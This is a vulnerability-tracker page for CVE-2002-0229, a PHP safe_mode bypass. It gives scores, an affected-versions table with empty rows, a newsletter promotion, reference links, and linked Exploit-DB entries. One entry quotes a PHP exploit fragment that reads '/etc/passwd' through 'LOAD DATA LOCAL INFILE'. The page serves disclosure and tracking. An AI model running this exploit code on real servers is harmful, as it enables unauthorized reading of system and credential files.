CVE-2002-0229
published 2002-05-16CVE-2002-0229: Safe Mode feature (safe_mode) in PHP 3.0 through 4.1.0 allows attackers with access to the MySQL database to bypass Safe Mode access restrictions and read…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.58%
94.9th percentile
Safe Mode feature (safe_mode) in PHP 3.0 through 4.1.0 allows attackers with access to the MySQL database to bypass Safe Mode access restrictions and read arbitrary files using "LOAD DATA INFILE LOCAL" SQL statements.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)
exploitdb·2002-02-03
CVE-2004-0327 PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)
---
Exploit-DB
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)
exploitdb·2002-02-03
CVE-2004-0327 PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)
---
options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();
?>
Exploit-DB
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)
exploitdb·2002-02-03
CVE-2004-0327 PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)
---
<?php
/*
source: https://www.securityfocus.com/bid/4026/info
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/
/*
PHP Safe Mode Problem
This script will connect to a database server running locally or
otherwise,
cr
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=101286577109716&w=2http://marc.info/?l=bugtraq&m=101304702002321&w=2http://marc.info/?l=ntbugtraq&m=101285016125377&w=2http://marc.info/?l=ntbugtraq&m=101303065423534&w=2http://marc.info/?l=ntbugtraq&m=101303819613337&w=2http://www.iss.net/security_center/static/8105.phphttp://www.securityfocus.com/bid/4026http://marc.info/?l=bugtraq&m=101286577109716&w=2http://marc.info/?l=bugtraq&m=101304702002321&w=2http://marc.info/?l=ntbugtraq&m=101285016125377&w=2http://marc.info/?l=ntbugtraq&m=101303065423534&w=2http://marc.info/?l=ntbugtraq&m=101303819613337&w=2http://www.iss.net/security_center/static/8105.phphttp://www.securityfocus.com/bid/4026
2002-05-16
Published